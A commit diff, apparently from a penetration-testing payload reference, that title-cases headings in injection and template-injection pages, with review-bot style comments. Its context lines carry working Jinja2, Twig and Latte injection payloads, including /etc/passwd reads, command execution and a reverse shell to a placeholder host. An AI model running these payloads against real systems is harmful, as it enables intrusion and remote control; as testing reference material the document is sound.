Commit
XPATH + XSS + XXE + XSLT
swisskyrepo committed Nov 30, 2024
1 parent 8c09568 commit 32d9f75
Showing 15 changed files with 234 additions and 200 deletions.
8 changes: 4 additions & 4 deletions SQL Injection/Cassandra Injection.md
Expand Up @@ -6,8 +6,8 @@
## Summary

* [CQL Injection Limitations](#cql-injection-limitations)
* [Cassandra comment](#cassandra-comment)
* [Cassandra - Login Bypass](#cassandra---login-bypass)
* [Cassandra Comment](#cassandra-comment)
* [Cassandra Login Bypass](#cassandra-login-bypass)
* [Example #1](#example-1)
* [Example #2](#example-2)
* [References](#references)
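Review bot: changing the anchors from `#cassandra---login-bypass` to `#cassandra-login-bypass` matches the slug GitHub will generate for the renamed heading, but any other page in the repository (or an external bookmark) that links to the old anchor breaks silently; grep the repo for `cassandra---login-bypass` and `cassandra-comment` references before merging.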
Expand All @@ -26,14 +26,14 @@
* CQL does not allow subqueries or other nested statements, so a query like `SELECT * FROM table WHERE column=(SELECT column FROM table LIMIT 1);` would be rejected.


## Cassandra comment
## Cassandra Comment

```sql
/* Cassandra Comment */
```


## Cassandra - Login Bypass
## Cassandra Login Bypass

### Example #1

1 change: 0 additions & 1 deletion SQL Injection/DB2 Injection.md
Expand Up @@ -54,7 +54,6 @@

## DB2 Methodology


| Description | SQL Query |
| ---------------- | ------------------------------------ |
| List databases | `SELECT distinct(table_catalog) FROM sysibm.tables` |
8 changes: 4 additions & 4 deletions Server Side Template Injection/ASP.md
Expand Up @@ -6,8 +6,8 @@
## Summary

- [ASP.NET Razor](#aspnet-razor)
- [ASP.NET Razor - Basic injection](#aspnet-razor---basic-injection)
- [ASP.NET Razor - Command execution](#aspnet-razor---command-execution)
- [ASP.NET Razor - Basic Injection](#aspnet-razor---basic-injection)
- [ASP.NET Razor - Command Execution](#aspnet-razor---command-execution)
- [References](#references)


Expand All @@ -18,13 +18,13 @@
> Razor is a markup syntax that lets you embed server-based code (Visual Basic and C#) into web pages.

### ASP.NET Razor - Basic injection
### ASP.NET Razor - Basic Injection

```powershell
@(1+2)
```

### ASP.NET Razor - Command execution
### ASP.NET Razor - Command Execution

```csharp
@{
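Review bot: the fence around `@(1+2)` is tagged `powershell`, but the content is Razor markup; the next block in this same hunk is tagged `csharp`. Use `csharp` for consistency (or `cshtml`, which GitHub also highlights) so the syntax colouring is not misleading.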
20 changes: 10 additions & 10 deletions Server Side Template Injection/PHP.md
Expand Up @@ -8,13 +8,13 @@
- [Templating Libraries](#templating-libraries)
- [Smarty](#smarty)
- [Twig](#twig)
- [Twig - Basic injection](#twig---basic-injection)
- [Twig - Template format](#twig---template-format)
- [Twig - Basic Injection](#twig---basic-injection)
- [Twig - Template Format](#twig---template-format)
- [Twig - Arbitrary File Reading](#twig---arbitrary-file-reading)
- [Twig - Code execution](#twig---code-execution)
- [Twig - Code Execution](#twig---code-execution)
- [Latte](#latte)
- [Latte - Basic injection](#latte---basic-injection)
- [Latte - Code execution](#latte---code-execution)
- [Latte - Basic Injection](#latte---basic-injection)
- [Latte - Code Execution](#latte---code-execution)
- [patTemplate](#pattemplate)
- [PHPlib](#phplib-and-html_template_phplib)
- [Plates](#plates)
Expand Down Expand Up @@ -53,7 +53,7 @@
[Official website](https://twig.symfony.com/)
> Twig is a modern template engine for PHP.
### Twig - Basic injection
### Twig - Basic Injection

```python
{{7*7}}
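Review bot: `### Twig - Basic Injection` sits directly under the blockquote `> Twig is a modern template engine for PHP.` with no blank line; it renders only because an ATX heading interrupts a paragraph, and it is inconsistent with the spacing used elsewhere in the file. Add a blank line, and consider tagging the fence `twig` rather than `python`, since the block is Twig syntax.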
Expand All @@ -63,7 +63,7 @@
{{app.request.server.all|join(',')}}
```

### Twig - Template format
### Twig - Template Format

```python
$output = $twig > render (
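Review bot: the unchanged context line `$output = $twig > render (` is not valid PHP; it reads like `$twig->render(` that lost its `-` in an earlier edit. Since this hunk already touches the section heading, restoring `$output = $twig->render(` in the same pass would fix it.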
Expand All @@ -84,7 +84,7 @@ $output = $twig > render (
{{include("wp-config.php")}}
```

### Twig - Code execution
### Twig - Code Execution

```python
{{self}}
Expand Down Expand Up @@ -118,13 +118,13 @@ email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld

## Latte

### Latte - Basic injection
### Latte - Basic Injection

```php
{var $X="POC"}{$X}
```

### Latte - Code execution
### Latte - Code Execution

```php
{php system('nslookup oastify.com')}
72 changes: 36 additions & 36 deletions Server Side Template Injection/Python.md
Expand Up @@ -7,29 +7,29 @@

- [Templating Libraries](#templating-libraries)
- [Django](#django)
- [Django - Basic injection](#django---basic-injection)
- [Django - Cross-site scripting](#django---cross-site-scripting)
- [Django - Debug information leak](#django---debug-information-leak)
- [Django - Leaking app's Secret Key](#django---leaking-apps-secret-key)
- [Django - Basic Injection](#django---basic-injection)
- [Django - Cross-Site Scripting](#django---cross-site-scripting)
- [Django - Debug Information Leak](#django---debug-information-leak)
- [Django - Leaking App's Secret Key](#django---leaking-apps-secret-key)
- [Django - Admin Site URL leak](#django---admin-site-url-leak)
- [Django - Admin username and password hash leak](#django---admin-username-and-password-hash-leak)
- [Django - Admin Username and Password Hash Leak](#django---admin-username-and-password-hash-leak)
- [Jinja2](#jinja2)
- [Jinja2 - Basic injection](#jinja2---basic-injection)
- [Jinja2 - Template format](#jinja2---template-format)
- [Jinja2 - Basic Injection](#jinja2---basic-injection)
- [Jinja2 - Template Format](#jinja2---template-format)
- [Jinja2 - Debug Statement](#jinja2---debug-statement)
- [Jinja2 - Dump all used classes](#jinja2---dump-all-used-classes)
- [Jinja2 - Dump all config variables](#jinja2---dump-all-config-variables)
- [Jinja2 - Read remote file](#jinja2---read-remote-file)
- [Jinja2 - Write into remote file](#jinja2---write-into-remote-file)
- [Jinja2 - Dump All Used Classes](#jinja2---dump-all-used-classes)
- [Jinja2 - Dump All Config Variables](#jinja2---dump-all-config-variables)
- [Jinja2 - Read Remote File](#jinja2---read-remote-file)
- [Jinja2 - Write Into Remote File](#jinja2---write-into-remote-file)
- [Jinja2 - Remote Command Execution](#jinja2---remote-command-execution)
- [Forcing output on blind RCE](#jinja2---forcing-output-on-blind-rce)
- [Exploit the SSTI by calling os.popen().read()](#exploit-the-ssti-by-calling-ospopenread)
- [Exploit the SSTI by calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen)
- [Exploit the SSTI by calling Popen without guessing the offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset)
- [Exploit the SSTI by writing an evil config file.](#exploit-the-ssti-by-writing-an-evil-config-file)
- [Jinja2 - Filter bypass](#jinja2---filter-bypass)
- [Forcing Output On Blind RCE](#jinja2---forcing-output-on-blind-rce)
- [Exploit The SSTI By Calling os.popen().read()](#exploit-the-ssti-by-calling-ospopenread)
- [Exploit The SSTI By Calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen)
- [Exploit The SSTI By Calling Popen Without Guessing The Offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset)
- [Exploit The SSTI By Writing an Evil Config File](#exploit-the-ssti-by-writing-an-evil-config-file)
- [Jinja2 - Filter Bypass](#jinja2---filter-bypass)
- [Tornado](#tornado)
- [Tornado - Basic injection](#tornado---basic-injection)
- [Tornado - Basic Injection](#tornado---basic-injection)
- [Tornado - Remote Command Execution](#tornado---remote-command-execution)
- [Mako](#mako)
- [Mako - Remote Command Execution](#mako---remote-command-execution)
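Review bot: title-casing is not applied uniformly in this hunk: `Exploit The SSTI By Writing an Evil Config File` keeps a lowercase `an`, `Django - Admin Username and Password Hash Leak` keeps a lowercase `and`, and `Django - Admin Site URL leak` is left untouched with a lowercase `leak`. Pick one convention (lowercase articles and conjunctions, or capitalise every word) and apply it to every entry, since the section headings later in this commit are being renamed to match.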
Expand All @@ -54,7 +54,7 @@

Django template language supports 2 rendering engines by default: Django Templates (DT) and Jinja2. Django Templates is much simpler engine. It does not allow calling of passed object functions and impact of SSTI in DT is often less severe than in Jinja2.

### Django - Basic injection
### Django - Basic Injection

```python
{% csrf_token %} # Causes error with Jinja2
Expand All @@ -63,20 +63,20 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
```


### Django - Cross-site scripting
### Django - Cross-Site Scripting

```python
{{ '<script>alert(3)</script>' }}
{{ '<script>alert(3)</script>' | safe }}
```

### Django - Debug information leak
### Django - Debug Information Leak

```python
{% debug %}
```

### Django - Leaking app’s Secret Key
### Django - Leaking App's Secret Key

```python
{{ messages.storages.0.signer.key }}
Expand All @@ -89,7 +89,7 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
{% include 'admin/base.html' %}
```

### Django - Admin username and password hash leak
### Django - Admin Username And Password Hash Leak


```
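Review bot: `### Django - Admin Username And Password Hash Leak` capitalises `And`, but the TOC entry for the same section in this commit reads `Admin Username and Password Hash Leak`; the link still resolves because GitHub lowercases slugs, but the visible text should agree. The fence opened on the last context line also has no language tag, unlike the surrounding blocks.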
Expand All @@ -104,7 +104,7 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
[Official website](https://jinja.palletsprojects.com/)
> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
### Jinja2 - Basic injection
### Jinja2 - Basic Injection

```python
{{4*4}}[[5*5]]
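Review bot: same spacing issue as the Twig section: `### Jinja2 - Basic Injection` follows the `> Jinja2 is a full featured template engine ...` blockquote with no blank line. Insert one so the heading is unambiguously outside the quote.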
Expand All @@ -115,7 +115,7 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
Jinja2 is used by Python Web Frameworks such as Django or Flask.
The above injections have been tested on a Flask application.

### Jinja2 - Template format
### Jinja2 - Template Format

```python
{% extends "layout.html" %}
Expand All @@ -139,7 +139,7 @@ If the Debug Extension is enabled, a `{% debug %}` tag will be available to dump

Source: https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement

### Jinja2 - Dump all used classes
### Jinja2 - Dump All Used Classes

```python
{{ [].class.base.subclasses() }}
Expand All @@ -153,7 +153,7 @@ Access `__globals__` and `__builtins__`:
{{ self.__init__.__globals__.__builtins__ }}
```

### Jinja2 - Dump all config variables
### Jinja2 - Dump All Config Variables

```python
{% for key, value in config.iteritems() %}
Expand All @@ -162,7 +162,7 @@ Access `__globals__` and `__builtins__`:
{% endfor %}
```

### Jinja2 - Read remote file
### Jinja2 - Read Remote File

```python
# ''.__class__.__mro__[2].__subclasses__()[40] = File class
Expand All @@ -172,7 +172,7 @@ Access `__globals__` and `__builtins__`:
{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}
```

### Jinja2 - Write into remote file
### Jinja2 - Write Into Remote File

```python
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
Expand All @@ -186,7 +186,7 @@ Listen for connection
nc -lnvp 8000
```

#### Jinja2 - Forcing output on blind RCE
#### Jinja2 - Forcing Output On Blind RCE

You can import Flask functions to return an output from the vulnerable page.

Expand All @@ -203,7 +203,7 @@ def hook(*args, **kwargs):
```


#### Exploit the SSTI by calling os.popen().read()
#### Exploit The SSTI By Calling os.popen().read()

```python
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}
Expand Down Expand Up @@ -235,7 +235,7 @@ With [objectwalker](https://github.com/p0dalirius/objectwalker) we can find a pa

Source: https://twitter.com/podalirius_/status/1655970628648697860

#### Exploit the SSTI by calling subprocess.Popen
#### Exploit The SSTI By Calling subprocess.Popen

:warning: the number 396 will vary depending of the application.

Expand All @@ -244,7 +244,7 @@ Source: https://twitter.com/podalirius_/status/1655970628648697860
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
```
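Review bot: `depending of the application` should read `depending on the application`; the heading directly above it is already being edited, so the grammar fix belongs in the same pass.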

#### Exploit the SSTI by calling Popen without guessing the offset
#### Exploit The SSTI By Calling Popen Without Guessing The Offset

```python
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
Expand All @@ -257,7 +257,7 @@ In another GET parameter include a variable named "input" that contains the comm
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
```

#### Exploit the SSTI by writing an evil config file.
#### Exploit The SSTI By Writing An Evil Config File

```python
# evil config
Expand All @@ -270,7 +270,7 @@ In another GET parameter include a variable named "input" that contains the comm
{{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }}
```

### Jinja2 - Filter bypass
### Jinja2 - Filter Bypass

```python
request.__class__
Expand Down Expand Up @@ -313,7 +313,7 @@ Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by http

## Tornado

### Tornado - Basic injection
### Tornado - Basic Injection

```py
{{7*7}}
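Review bot: this block opens with a ```py fence while the other blocks in the file use ```python; normalise to `python` so the fence tags are consistent across the page.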
10 changes: 5 additions & 5 deletions Type Juggling/README.md
Expand Up @@ -6,8 +6,8 @@
## Summary

* [Loose Comparison](#loose-comparison)
* [True statements](#true-statements)
* [NULL statements](#null-statements)
* [True Statements](#true-statements)
* [NULL Statements](#null-statements)
* [Loose Comparison](#loose-comparison)
* [Magic Hashes](#magic-hashes)
* [Methodology](#methodology)
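Review bot: `* [Loose Comparison](#loose-comparison)` appears twice in this TOC (the first and fourth entries) and both point at the same anchor; either the second one was meant to link to a different section or it should be dropped.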
Expand All @@ -22,7 +22,7 @@
- **Loose** comparison: using `== or !=` : both variables have "the same value".
- **Strict** comparison: using `=== or !==` : both variables have "the same type and the same value".

### True statements
### True Statements

| Statement | Output |
| --------------------------------- |:---------------:|
Expand All @@ -44,7 +44,7 @@
![LooseTypeComparison](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Type%20Juggling/Images/table_representing_behavior_of_PHP_with_loose_type_comparisons.png?raw=true)

Loose Type Comparisons occurs in many languages:
Loose Type comparisons occurs in many languages:

* [MariaDB](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Mariadb)
* [MySQL](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Mysql)
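Review bot: the edit turns `Loose Type Comparisons occurs` into `Loose Type comparisons occurs`, which lowercases a word in a commit that otherwise title-cases, and leaves the subject/verb disagreement in place. Suggest `Loose type comparisons occur in many languages:`.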
Expand All @@ -56,7 +56,7 @@ Loose Type Comparisons occurs in many languages:
* [SQLite](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/SQLite/2.6.0)


### NULL statements
### NULL Statements

| Function | Statement | Output |
| -------- | -------------------------- |:---------------:|